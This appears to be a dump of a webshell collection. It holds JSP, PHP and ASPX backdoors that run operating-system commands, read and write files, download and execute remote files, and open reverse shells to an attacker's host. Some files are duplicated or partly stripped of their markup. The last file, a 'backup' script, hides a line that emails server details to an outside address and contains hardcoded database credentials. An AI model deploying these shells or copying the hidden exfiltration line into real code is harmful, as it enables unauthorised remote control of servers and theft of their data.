 52 | 			byte[] b = new byte[1024];
 53 | 		    int a = 0;
 54 | 		    while((a = in.read(b))!=-1){
 55 | 		    	baos.write(b,0,a);
 56 | 			}
 57 | 			return baos;
 58 | 		}
 59 | 		
 60 | 		/**
 61 | 		 * 复制流到文件,如果文件存在默认会覆盖
 62 | 		 * @param in
 63 | 		 * @param path
 64 | 		 * @throws IOException
 65 | 		 */
 66 | 		public static void copyInputStreamToFile(InputStream in,String path) throws IOException{
 67 | 			FileOutputStream fos = new FileOutputStream(path);
 68 | 			fos.write(inutStreamToOutputStream(in).toByteArray());
 69 | 			fos.flush();
 70 | 			fos.close();
 71 | 		}
 72 | 		
 73 | 		/**
 74 | 		 * 模仿Linux下的cat Windows下的type 查看文件内容 
 75 | 		 * @param path
 76 | 		 * @return
 77 | 		 * @throws IOException
 78 | 		 */
 79 | 		public static String cat(String path) throws IOException {
 80 | 			return new String(inutStreamToOutputStream(new FileInputStream(path)).toByteArray());
 81 | 		}
 82 | 		
 83 | 		/**
 84 | 		 * 执行操作系统命令 如果是windows某些命令执行不了,可以用 cmd /c dir 执行dir命令
 85 | 		 * @param cmd
 86 | 		 * @return
 87 | 		 */
 88 | 		public static String exec(String cmd) {
 89 | 			try {
 90 | 				return new String(inutStreamToOutputStream(Runtime.getRuntime().exec(cmd).getInputStream()).toByteArray(),encoding);
 91 | 			} catch (IOException e) {
 92 | 				return exceptionToString(e);
 93 | 			}
 94 | 		}
 95 | 		
 96 | 		/**
 97 | 		 * 下载文件到指定目录,保存的文件名必须指定
 98 | 		 * @param url
 99 | 		 * @param path
100 | 		 * @throws MalformedURLException
101 | 		 * @throws IOException
102 | 		 */
103 | 		public static void download(String url,String path) throws MalformedURLException, IOException{
104 | 			copyInputStreamToFile(new URL(url).openConnection().getInputStream(), path);
105 | 		}
106 | 		
107 | 		/**
108 | 		 * 连接远程端口,提供本地命令执行入口
109 | 		 * @param host
110 | 		 * @param port
111 | 		 * @throws UnknownHostException
112 | 		 * @throws IOException
113 | 		 */
114 | 		public static void shell(String host,int port) throws UnknownHostException, IOException{
115 | 			Socket s = new Socket(host,port);
116 | 			OutputStream out = s.getOutputStream();
117 | 			InputStream in = s.getInputStream();
118 | 			out.write(("User:\t"+exec("whoami")).getBytes());
119 | 			int a = 0;
120 | 			byte[] b = new byte[1024];
121 | 			while((a=in.read(b))!=-1){
122 | 				out.write(exec(new String(b,0,a,"UTF-8").trim()).getBytes("UTF-8"));
123 | 			}
124 | 		}
125 | 		
126 | 		/**
127 | 		 * 下载远程文件并执行,命令执行完成后会删除下载的文件
128 | 		 * @param url
129 | 		 * @param fileName
130 | 		 * @param cmd
131 | 		 * @return
132 | 		 * @throws MalformedURLException
133 | 		 * @throws IOException
134 | 		 */
135 | 		public static String auto(String url,String fileName,String cmd) throws MalformedURLException, IOException{
136 | 			download(url, fileName);
137 | 			String out = exec(cmd);
138 | 			new File(fileName).delete();
139 | 			return out;
140 | 		}
141 | 	
142 | 	
143 | 		try{
144 | 		String action = request.getParameter("action");
145 | 		out.println("
");
146 | 		if(isNotEmpty(action)){
147 | 			if("shell".equalsIgnoreCase(action)){
148 | 				shell(request.getParameter("host"), Integer.parseInt(request.getParameter("port")));
149 | 			}else if("download".equalsIgnoreCase(action)){
150 | 				download(request.getParameter("url"), request.getParameter("path"));
151 | 			}else if("exec".equalsIgnoreCase(action)){
152 | 				out.println(exec(request.getParameter("cmd")));
153 | 			}else if("cat".equalsIgnoreCase(action)){
154 | 				out.println(cat(request.getParameter("path")));
155 | 			}else if("auto".equalsIgnoreCase(action)){
156 | 				out.println(auto(request.getParameter("url"),request.getParameter("fileName"),request.getParameter("cmd")));
157 | 			}
158 | 		}
159 | 		out.println("
");
160 | 	}catch(Exception e){
161 | 		out.println(exceptionToString(e));
162 | 	}
163 | 	
164 | 


--------------------------------------------------------------------------------
/Php/WinX Shell.php:
--------------------------------------------------------------------------------
  1 | -:[GreenwooD]:- WinX Shell
  2 | 
  3 | ";
 32 | print    "";
 33 | print      "You:" ;
 34 | print      " ".$_SERVER['REMOTE_ADDR']." [".$host."] " ;
 35 | print    "";
 36 | print    "";
 37 | print      "Version OS:" ;
 38 | print      " $veros ";
 39 | print    "";
 40 | print    "";
 41 | print     "Server:";
 42 | print      "".$_SERVER['SERVER_SIGNATURE']."";
 43 | print    "";
 44 | print    "";
 45 | print     "Win Dir:";
 46 | print      " $windir ";
 47 | print    "";
 48 | print  "";
 49 | print  "
";
 50 | 
 51 | //------- [netstat -an] and [ipconfig] and [tasklist] ------------
 52 | print "
";
 53 | print "";
 54 | print "   ";
 55 | print "";
 56 | print "   ";
 57 | print "";
 58 | print "
";
 59 | //-------------------------------
 60 | 
 61 | 
 62 | //-------------------------------
 63 | 
 64 | print "";
 67 | print "
";
 68 | 
 69 | //-------------------------------
 70 | 
 71 | print "
";
 72 | print "CMD: ";
 73 | print "
";
 74 | print "";
 75 | print " ";
 76 | print "
";
 77 | 
 78 | //-------------------------------
 79 | 
 80 | print "
";
 81 | print "Upload:";
 82 | print "
";
 83 | print "";
 84 | print "File: ";
 85 | print " Filename on server:  ";
 86 | print" ";
 87 | print"
";
 88 | 
 89 | ?>
 90 | 
 91 | 
 92 | 
100 | 
101 | 
102 | 
Created by -:[GreenwooD]:- 

103 | 


--------------------------------------------------------------------------------
/Php/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 
 5 | 
!Safe 
 6 | Mode Shell v1.0!

 7 | 

 8 | 	

 9 | 	

10 | 

11 | 	

12 | 		
 

18 | 	

19 | 
20 | 
21 | 
25 | */
26 | 
27 | echo "Safe Mode Shell"; 
28 | 
29 | 
30 | 
31 | 
32 | $tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp
33 | 
34 | if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
35 | {
36 |  $safemode = true;
37 |  $hsafemode = "ON (secure)";
38 | }
39 | else {$safemode = false; $hsafemode = "OFF (not secure)";}
40 | echo("Safe-mode: $hsafemode");
41 | $v = @ini_get("open_basedir");
42 | if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";}
43 | else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";}
44 | echo("
");
45 | echo("Open base dir: $hopenbasedir");
46 | echo("
");
47 | echo "Disable functions : ";
48 | if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";}
49 | $free = @diskfreespace($dir);
50 | if (!$free) {$free = 0;}
51 | $all = @disk_total_space($dir);
52 | if (!$all) {$all = 0;}
53 | $used = $all-$free;
54 | $used_percent = @round(100/($all/$free),2);
55 | 
56 | echo "
\n";
57 | if(empty($file)){
58 | if(empty($_GET['file'])){
59 | if(empty($_POST['file'])){
60 | die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n 
PHP Emperor
62 | xb5@hotmail.com
");
63 | } else {
64 | $file=$_POST['file'];
65 | }
66 | } else {
67 | $file=$_GET['file'];
68 | }
69 | }
70 | 
71 | $temp=tempnam($tymczas, "cx");
72 | 
73 | if(copy("compress.zlib://".$file, $temp)){
74 | $zrodlo = fopen($temp, "r");
75 | $tekst = fread($zrodlo, filesize($temp));
76 | fclose($zrodlo);
77 | echo "--- Start File ".htmlspecialchars($file)."
78 | -------------\n".htmlspecialchars($tekst)."\n--- End File
79 | ".htmlspecialchars($file)." ---------------\n";
80 | unlink($temp);
81 | die("\nFile
82 | ".htmlspecialchars($file)." has been already loaded. PHP Emperor 
83 | ;]");
84 | } else {
85 | die("
Sorry... File
86 | ".htmlspecialchars($file)." dosen't exists or you don't have
87 | access.
");
88 | }
89 | ?>


--------------------------------------------------------------------------------
/Php/Safe_Mode_Bypass_PHP_4.4.2_and_PHP_5.1.2.php:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 
 5 | 
!Safe 
 6 | Mode Shell v1.0!

 7 | 

 8 | 	

 9 | 	

10 | 

11 | 	

12 | 		
 

18 | 	

19 | 
20 | 
21 | 
25 | */
26 | 
27 | echo "Safe Mode Shell"; 
28 | 
29 | 
30 | 
31 | 
32 | $tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp
33 | 
34 | if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
35 | {
36 |  $safemode = true;
37 |  $hsafemode = "ON (secure)";
38 | }
39 | else {$safemode = false; $hsafemode = "OFF (not secure)";}
40 | echo("Safe-mode: $hsafemode");
41 | $v = @ini_get("open_basedir");
42 | if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";}
43 | else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";}
44 | echo("
");
45 | echo("Open base dir: $hopenbasedir");
46 | echo("
");
47 | echo "Disable functions : ";
48 | if(''==($df=@ini_get('disable_functions'))){echo "NONE";}else{echo "$df";}
49 | $free = @diskfreespace($dir);
50 | if (!$free) {$free = 0;}
51 | $all = @disk_total_space($dir);
52 | if (!$all) {$all = 0;}
53 | $used = $all-$free;
54 | $used_percent = @round(100/($all/$free),2);
55 | 
56 | echo "
\n";
57 | if(empty($file)){
58 | if(empty($_GET['file'])){
59 | if(empty($_POST['file'])){
60 | die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n 
PHP Emperor
62 | xb5@hotmail.com
");
63 | } else {
64 | $file=$_POST['file'];
65 | }
66 | } else {
67 | $file=$_GET['file'];
68 | }
69 | }
70 | 
71 | $temp=tempnam($tymczas, "cx");
72 | 
73 | if(copy("compress.zlib://".$file, $temp)){
74 | $zrodlo = fopen($temp, "r");
75 | $tekst = fread($zrodlo, filesize($temp));
76 | fclose($zrodlo);
77 | echo "--- Start File ".htmlspecialchars($file)."
78 | -------------\n".htmlspecialchars($tekst)."\n--- End File
79 | ".htmlspecialchars($file)." ---------------\n";
80 | unlink($temp);
81 | die("\nFile
82 | ".htmlspecialchars($file)." has been already loaded. PHP Emperor 
83 | ;]");
84 | } else {
85 | die("
Sorry... File
86 | ".htmlspecialchars($file)." dosen't exists or you don't have
87 | access.
");
88 | }
89 | ?>
90 | 
91 | 


--------------------------------------------------------------------------------
/Php/SimShell 1.0 - Simorgh Security MGZ.php:
--------------------------------------------------------------------------------
  1 |  array('pipe', 'w'),
 65 |                            2 => array('pipe', 'w')),
 66 |                      $io);
 67 | 
 68 | 
 69 |       while (!feof($io[1])) {
 70 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
 71 |                                                 ENT_COMPAT, 'UTF-8');
 72 |       }
 73 | 
 74 |       while (!feof($io[2])) {
 75 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
 76 |                                                 ENT_COMPAT, 'UTF-8');
 77 |       }
 78 |       
 79 |       fclose($io[1]);
 80 |       fclose($io[2]);
 81 |       proc_close($p);
 82 |     }
 83 |   }
 84 | 
 85 | 
 86 |   if (empty($_SESSION['history'])) {
 87 |     $js_command_hist = '""';
 88 |   } else {
 89 |     $escaped = array_map('addslashes', $_SESSION['history']);
 90 |     $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
 91 |   }
 92 | 
 93 | 
 94 | header('Content-Type: text/html; charset=UTF-8');
 95 | 
 96 | echo '' . "\n";
 97 | ?>
 98 | 
 99 | 
100 |   SimShell - Simorgh Security MGZ
101 |   
102 | 
103 |   
132 | 
133 | 
134 | 
135 | 
136 | 
137 | 
138 | 
139 | 
140 | 
141 | 
142 | 
143 | 
144 | 
145 | 
146 | 
147 | 
148 | 
149 | 
150 | 
151 | 
 Directory:  
152 | 

153 | 
154 | 

155 | 

156 | 
163 | 

164 |   cmd:
166 |    Rows: 
167 |   
168 | 

169 | 

170 |   

171 |   

172 |  Copyright 2004-Simorgh Security

173 |   Make On PhpShell Kernel

174 |   
175 |   www.simorgh-ev.com

176 | 

177 | 

178 | 
179 | 
180 | 


--------------------------------------------------------------------------------
/Php/SimShell_1.0_-_Simorgh_Security_MGZ.php:
--------------------------------------------------------------------------------
  1 |  array('pipe', 'w'),
 65 |                            2 => array('pipe', 'w')),
 66 |                      $io);
 67 | 
 68 | 
 69 |       while (!feof($io[1])) {
 70 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
 71 |                                                 ENT_COMPAT, 'UTF-8');
 72 |       }
 73 | 
 74 |       while (!feof($io[2])) {
 75 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
 76 |                                                 ENT_COMPAT, 'UTF-8');
 77 |       }
 78 |       
 79 |       fclose($io[1]);
 80 |       fclose($io[2]);
 81 |       proc_close($p);
 82 |     }
 83 |   }
 84 | 
 85 | 
 86 |   if (empty($_SESSION['history'])) {
 87 |     $js_command_hist = '""';
 88 |   } else {
 89 |     $escaped = array_map('addslashes', $_SESSION['history']);
 90 |     $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
 91 |   }
 92 | 
 93 | 
 94 | header('Content-Type: text/html; charset=UTF-8');
 95 | 
 96 | echo '' . "\n";
 97 | ?>
 98 | 
 99 | 
100 |   SimShell - Simorgh Security MGZ
101 |   
102 | 
103 |   
132 | 
133 | 
134 | 
135 | 
136 | 
137 | 
138 | 
139 | 
140 | 
141 | 
142 | 
143 | 
144 | 
145 | 
146 | 
147 | 
148 | 
149 | 
150 | 
151 | 
 Directory:  
152 | 

153 | 
154 | 

155 | 

156 | 
163 | 

164 |   cmd:
166 |    Rows: 
167 |   
168 | 

169 | 

170 |   

171 |   

172 |  Copyright 2004-Simorgh Security

173 |   Make On PhpShell Kernel

174 |   
175 |   www.simorgh-ev.com

176 | 

177 | 

178 | 
179 | 
180 | 
181 | 


--------------------------------------------------------------------------------
/Jsp/一句话/caidao.jsp:
--------------------------------------------------------------------------------
 1 | <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
 2 | <%!
 3 | String Pwd="admin";
 4 | String EC(String s,String c)throws Exception{return s;}//new String(s.getBytes("ISO-8859-1"),c);}
 5 | Connection GC(String s)throws Exception{String[] x=s.trim().split("\r\n");Class.forName(x[0].trim()).newInstance();
 6 | Connection c=DriverManager.getConnection(x[1].trim());if(x.length>2){c.setCatalog(x[2].trim());}return c;}
 7 | void AA(StringBuffer sb)throws Exception{File r[]=File.listRoots();for(int i=0;i"+"|").getBytes(),0,3);while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.write(("|"+"<-").getBytes(),0,3);os.close();is.close();}
17 | void GG(String s, String d)throws Exception{String h="0123456789ABCDEF";int n;File f=new File(s);f.createNewFile();
18 | FileOutputStream os=new FileOutputStream(f);for(int i=0;i<%
45 | String cs=request.getParameter("z0")+"";request.setCharacterEncoding(cs);response.setContentType("text/html;charset="+cs);
46 | String Z=EC(request.getParameter(Pwd)+"",cs);String z1=EC(request.getParameter("z1")+"",cs);String z2=EC(request.getParameter("z2")+"",cs);
47 | StringBuffer sb=new StringBuffer("");try{sb.append("->"+"|");
48 | if(Z.equals("A")){String s=new File(application.getRealPath(request.getRequestURI())).getParent();sb.append(s+"\t");if(!s.substring(0,1).equals("/")){AA(sb);}}
49 | else if(Z.equals("B")){BB(z1,sb);}else if(Z.equals("C")){String l="";BufferedReader br=new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));
50 | while((l=br.readLine())!=null){sb.append(l+"\r\n");}br.close();}
51 | else if(Z.equals("D")){BufferedWriter bw=new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));
52 | bw.write(z2);bw.close();sb.append("1");}else if(Z.equals("E")){EE(z1);sb.append("1");}else if(Z.equals("F")){FF(z1,response);}
53 | else if(Z.equals("G")){GG(z1,z2);sb.append("1");}else if(Z.equals("H")){HH(z1,z2);sb.append("1");}else if(Z.equals("I")){II(z1,z2);sb.append("1");}
54 | else if(Z.equals("J")){JJ(z1);sb.append("1");}else if(Z.equals("K")){KK(z1,z2);sb.append("1");}else if(Z.equals("L")){LL(z1,z2);sb.append("1");}
55 | else if(Z.equals("M")){String[] c={z1.substring(2),z1.substring(0,2),z2};Process p=Runtime.getRuntime().exec(c);
56 | MM(p.getInputStream(),sb);MM(p.getErrorStream(),sb);}else if(Z.equals("N")){NN(z1,sb);}else if(Z.equals("O")){OO(z1,sb);}
57 | else if(Z.equals("P")){PP(z1,sb);}else if(Z.equals("Q")){QQ(cs,z1,z2,sb);}
58 | }catch(Exception e){sb.append("ERROR"+":// "+e.toString());}sb.append("|"+"<-");out.print(sb.toString());
59 | %>


--------------------------------------------------------------------------------
/Php/php-reverse-shell.php:
--------------------------------------------------------------------------------
  1 |  array("pipe", "r"),  // stdin is a pipe that the child will read from
109 |    1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
110 |    2 => array("pipe", "w")   // stderr is a pipe that the child will write to
111 | );
112 | 
113 | $process = proc_open($shell, $descriptorspec, $pipes);
114 | 
115 | if (!is_resource($process)) {
116 | 	printit("ERROR: Can't spawn shell");
117 | 	exit(1);
118 | }
119 | 
120 | // Set everything to non-blocking
121 | // Reason: Occsionally reads will block, even though stream_select tells us they won't
122 | stream_set_blocking($pipes[0], 0);
123 | stream_set_blocking($pipes[1], 0);
124 | stream_set_blocking($pipes[2], 0);
125 | stream_set_blocking($sock, 0);
126 | 
127 | printit("Successfully opened reverse shell to $ip:$port");
128 | 
129 | while (1) {
130 | 	// Check for end of TCP connection
131 | 	if (feof($sock)) {
132 | 		printit("ERROR: Shell connection terminated");
133 | 		break;
134 | 	}
135 | 
136 | 	// Check for end of STDOUT
137 | 	if (feof($pipes[1])) {
138 | 		printit("ERROR: Shell process terminated");
139 | 		break;
140 | 	}
141 | 
142 | 	// Wait until a command is end down $sock, or some
143 | 	// command output is available on STDOUT or STDERR
144 | 	$read_a = array($sock, $pipes[1], $pipes[2]);
145 | 	$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
146 | 
147 | 	// If we can read from the TCP socket, send
148 | 	// data to process's STDIN
149 | 	if (in_array($sock, $read_a)) {
150 | 		if ($debug) printit("SOCK READ");
151 | 		$input = fread($sock, $chunk_size);
152 | 		if ($debug) printit("SOCK: $input");
153 | 		fwrite($pipes[0], $input);
154 | 	}
155 | 
156 | 	// If we can read from the process's STDOUT
157 | 	// send data down tcp connection
158 | 	if (in_array($pipes[1], $read_a)) {
159 | 		if ($debug) printit("STDOUT READ");
160 | 		$input = fread($pipes[1], $chunk_size);
161 | 		if ($debug) printit("STDOUT: $input");
162 | 		fwrite($sock, $input);
163 | 	}
164 | 
165 | 	// If we can read from the process's STDERR
166 | 	// send data down tcp connection
167 | 	if (in_array($pipes[2], $read_a)) {
168 | 		if ($debug) printit("STDERR READ");
169 | 		$input = fread($pipes[2], $chunk_size);
170 | 		if ($debug) printit("STDERR: $input");
171 | 		fwrite($sock, $input);
172 | 	}
173 | }
174 | 
175 | fclose($sock);
176 | fclose($pipes[0]);
177 | fclose($pipes[1]);
178 | fclose($pipes[2]);
179 | proc_close($process);
180 | 
181 | // Like print, but does nothing if we've daemonised ourself
182 | // (I can't figure out how to redirect STDOUT like a proper daemon)
183 | function printit ($string) {
184 | 	if (!$daemon) {
185 | 		print "$string\n";
186 | 	}
187 | }
188 | 
189 | ?> 
190 | 
191 | 
192 | 
193 | 


--------------------------------------------------------------------------------
/Php/Dive Shell 1.0 - Emperor Hacking Team.php:
--------------------------------------------------------------------------------
  1 |  array('pipe', 'w'),
 65 |                            2 => array('pipe', 'w')),
 66 |                      $io);
 67 | 
 68 | 
 69 |       while (!feof($io[1])) {
 70 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
 71 |                                                 ENT_COMPAT, 'UTF-8');
 72 |       }
 73 | 
 74 |       while (!feof($io[2])) {
 75 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
 76 |                                                 ENT_COMPAT, 'UTF-8');
 77 |       }
 78 |       
 79 |       fclose($io[1]);
 80 |       fclose($io[2]);
 81 |       proc_close($p);
 82 |     }
 83 |   }
 84 | 
 85 | 
 86 |   if (empty($_SESSION['history'])) {
 87 |     $js_command_hist = '""';
 88 |   } else {
 89 |     $escaped = array_map('addslashes', $_SESSION['history']);
 90 |     $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
 91 |   }
 92 | 
 93 | 
 94 | header('Content-Type: text/html; charset=UTF-8');
 95 | 
 96 | echo '' . "\n";
 97 | ?>
 98 | 
 99 | 
100 |   Dive Shell - Emperor Hacking Team
101 |   
102 | 
103 |   
132 | 
133 | 
134 | 
135 | 
136 | 
137 | 
138 | 
139 | 
140 | 
141 | 
142 | 
143 | 
144 | 
145 | 
146 | 
147 | 
148 | 
149 | 
150 | 
151 | 
 Directory:  
152 | 
153 | 

154 | 
155 | 

156 | 

157 |   

158 |   Command:
160 |     
161 |   
162 |     

169 | 

170 |   Rows:  
171 |   

172 | 

173 |   Edited By Emperor Hacking Team

174 | 

175 |   iM4n - FarHad - imm02tal - R$P

176 |  

177 | 

178 | 

179 | 
180 | 
181 | 

182 |     
183 |   

184 | 
185 | 
186 | 
187 | 


--------------------------------------------------------------------------------
/Php/Dive_Shell_1.0_Emperor_Hacking_Team.php:
--------------------------------------------------------------------------------
  1 |  array('pipe', 'w'),
 65 |                            2 => array('pipe', 'w')),
 66 |                      $io);
 67 | 
 68 | 
 69 |       while (!feof($io[1])) {
 70 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
 71 |                                                 ENT_COMPAT, 'UTF-8');
 72 |       }
 73 | 
 74 |       while (!feof($io[2])) {
 75 |         $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
 76 |                                                 ENT_COMPAT, 'UTF-8');
 77 |       }
 78 |       
 79 |       fclose($io[1]);
 80 |       fclose($io[2]);
 81 |       proc_close($p);
 82 |     }
 83 |   }
 84 | 
 85 | 
 86 |   if (empty($_SESSION['history'])) {
 87 |     $js_command_hist = '""';
 88 |   } else {
 89 |     $escaped = array_map('addslashes', $_SESSION['history']);
 90 |     $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
 91 |   }
 92 | 
 93 | 
 94 | header('Content-Type: text/html; charset=UTF-8');
 95 | 
 96 | echo '' . "\n";
 97 | ?>
 98 | 
 99 | 
100 |   Dive Shell - Emperor Hacking Team
101 |   
102 | 
103 |   
132 | 
133 | 
134 | 
135 | 
136 | 
137 | 
138 | 
139 | 
140 | 
141 | 
142 | 
143 | 
144 | 
145 | 
146 | 
147 | 
148 | 
149 | 
150 | 
151 | 
 Directory:  
152 | 
153 | 

154 | 
155 | 

156 | 

157 |   

158 |   Command:
160 |     
161 |   
162 |     

169 | 

170 |   Rows:  
171 |   

172 | 

173 |   Edited By Emperor Hacking Team

174 | 

175 |   iM4n - FarHad - imm02tal - R$P

176 |  

177 | 

178 | 

179 | 
180 | 
181 | 

182 |     
183 |   

184 | 
185 | 
186 | 
187 | 
188 | 


--------------------------------------------------------------------------------
/Aspx/Antak Webshell.aspx:
--------------------------------------------------------------------------------
  1 | <%@ Page Language="C#" Debug="true" Trace="false" %>
  2 | <%@ Import Namespace="System.Diagnostics" %>
  3 | <%@ Import Namespace="System.IO" %>
  4 | <%@ Import Namespace="System.IO.Compression" %>
  5 | 
  6 | <%--Antak - A Webshell which utilizes powershell.--%>
  7 | 
  8 | 
169 | 
170 | 
171 | Antak Webshell
172 |  
173 | 
174 | 

175 | 

176 |     

177 |     
178 |     
179 |     
180 | 
181 |     

182 |     

183 |         
184 |         
185 |         
186 |         
187 |         
188 |     

189 |     
190 |     

191 | 
192 | 
193 | 
194 |  

195 | 
196 | 


--------------------------------------------------------------------------------
/Php/hiddens shell v1.php:
--------------------------------------------------------------------------------
1 | 


--------------------------------------------------------------------------------
/Php/backupsql.php:
--------------------------------------------------------------------------------
  1 | 
 10 | * @version 0.2
 11 | * @date 18/08/2004
 12 | * @package Backup Server
 13 | * Upgraded Ver 2.0 (sending sql backup as attachment
 14 | * as email attachment, or send to a remote ftp server by
 15 | * @co-authors Cool Surfer and
 16 | * Neagu Mihai
 17 | */
 18 | 
 19 | set_time_limit(0);
 20 | $date = date("mdy-hia");
 21 | $dbserver = "localhost";
 22 | $dbuser = "vhacker_robot";
 23 | $dbpass = "mp2811987";
 24 | $dbname = "tvhacker_vbb3";
 25 | $file = "N-Cool-$date.sql.gz";
 26 | $gzip = TRUE;
 27 | $silent = TRUE;
 28 | 
 29 | function write($contents) {
 30 |     if ($GLOBALS['gzip']) {
 31 |         gzwrite($GLOBALS['fp'], $contents);
 32 |     } else {
 33 |         fwrite($GLOBALS['fp'], $contents);
 34 |     }
 35 | }
 36 | 
 37 | mysql_connect ($dbserver, $dbuser, $dbpass);
 38 | mysql_select_db($dbname);
 39 | 
 40 | if ($gzip) {
 41 |     $fp = gzopen($file, "w");
 42 | } else {
 43 |     $fp = fopen($file, "w");
 44 | }
 45 | 
 46 | $tables = mysql_query ("SHOW TABLES");
 47 | while ($i = mysql_fetch_array($tables)) {
 48 |     $i = $i['Tables_in_'.$dbname];
 49 | 
 50 |     if (!$silent) {
 51 |         echo "Backing up table ".$i."\n";
 52 |     }
 53 | 
 54 |     // Create DB code
 55 |     $create = mysql_fetch_array(mysql_query ("SHOW CREATE TABLE ".$i));
 56 | 
 57 |     write($create['Create Table'].";\n\n");
 58 | 
 59 |     // DB Table content itself
 60 |     $sql = mysql_query ("SELECT * FROM ".$i);
 61 |     if (mysql_num_rows($sql)) {
 62 |         while ($row = mysql_fetch_row($sql)) {
 63 |             foreach ($row as $j => $k) {
 64 |                 $row[$j] = "'".mysql_escape_string($k)."'";
 65 |             }
 66 | 
 67 |             write("INSERT INTO $i VALUES(".implode(",", $row).");\n");
 68 |         }
 69 |     }
 70 | }
 71 | 
 72 | $gzip ? gzclose($fp) : fclose ($fp);
 73 | 
 74 | // Optional Options You May Optionally Configure
 75 | 
 76 | $use_gzip = "yes";            // Set to No if you don't want the files sent in .gz format
 77 | $remove_sql_file = "no";  // Set this to yes if you want to remove the sql file after gzipping. Yes is recommended.
 78 | $remove_gzip_file = "no"; // Set this to yes if you want to delete the gzip file also. I recommend leaving it to "no"
 79 | 
 80 | // Configure the path that this script resides on your server.
 81 | 
 82 | $savepath = "/home/test/public_html/nt22backup"; // Full path to this directory. Do not use trailing slash!
 83 | 
 84 | $send_email = "yes";                        /* Do you want this database backup sent to your email? Yes/No? If Yes, Fill out the next 2 lines */
 85 | $to      = "lehungtk@gmail.com";    // Who to send the emails to, enter ur correct id.
 86 | $from    = "Neu-Cool@email.com";  // Who should the emails be sent from?, may change it.
 87 | 
 88 | $senddate = date("j F Y");
 89 | 
 90 | $subject = "MySQL Database Backup - $senddate"; // Subject in the email to be sent.
 91 | $message = "Your MySQL database has been backed up and is attached to this email"; // Brief Message.
 92 | 
 93 | $use_ftp = "";                             // Do you want this database backup uploaded to an ftp server? Fill out the next 4 lines
 94 | $ftp_server = "localhost";               // FTP hostname
 95 | $ftp_user_name = "ftp_username"; // FTP username
 96 | $ftp_user_pass = "ftp_password";   // FTP password
 97 | $ftp_path = "/"; // This is the path to upload on your ftp server!
 98 | 
 99 | // Do not Modify below this line! It will void your warranty :-D!
100 | 
101 | $date = date("mdy-hia");
102 | $filename = "$savepath/$dbname-$date.sql";
103 | 
104 | if($use_gzip=="yes"){
105 | $filename2 = $file;
106 | } else {
107 | $filename2 = "$savepath/$dbname-$date.sql";
108 | }
109 | 
110 | 
111 | if($send_email == "yes" ){
112 | $fileatt_type = filetype($filename2);
113 | $fileatt_name = "".$dbname."-".$date."_sql.tar.gz";
114 | 
115 | $headers = "From: $from";
116 | 
117 | // Read the file to be attached ('rb' = read binary)
118 | echo "Openning archive for attaching:".$filename2;
119 | $file = fopen($filename2,'rb');
120 | $data = fread($file,filesize($filename2));
121 | fclose($file);
122 | 
123 | // Generate a boundary string
124 | $semi_rand = md5(time());
125 | $mime_boundary = "==Multipart_Boundary_x{$semi_rand}x";
126 | 
127 | // Add the headers for a file attachment
128 | $headers .= "\nMIME-Version: 1.0\n" ."Content-Type: multipart/mixed;\n" ." boundary=\"{$mime_boundary}\"";$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
129 | 
130 | // Add a multipart boundary above the plain message
131 | $message = "This is a multi-part message in MIME format.\n\n"."--{$mime_boundary}\n" ."Content-Type: text/plain; charset=\"iso-8859-1\"\n" ."Content-Transfer-Encoding: 7bit\n\n" .
132 | $message . "\n\n";
133 | 
134 | // Base64 encode the file data
135 | $data = chunk_split(base64_encode($data));
136 | 
137 | // Add file attachment to the message
138 | echo "|{$mime_boundary}|{$fileatt_type}|{$fileatt_name}|{$fileatt_name}|{$mime_boundary}|
";
139 | $message .= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n"."Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
140 | $data . "\n\n" ."--{$mime_boundary}--\n";
141 | //$message.= "--{$mime_boundary}\n" ."Content-Type: {$fileatt_type};\n" ." name=\"{$fileatt_name}\"\n" "Content-Disposition: attachment;\n" ." filename=\"{$fileatt_name}\"\n" ."Content-Transfer-Encoding: base64\n\n" .
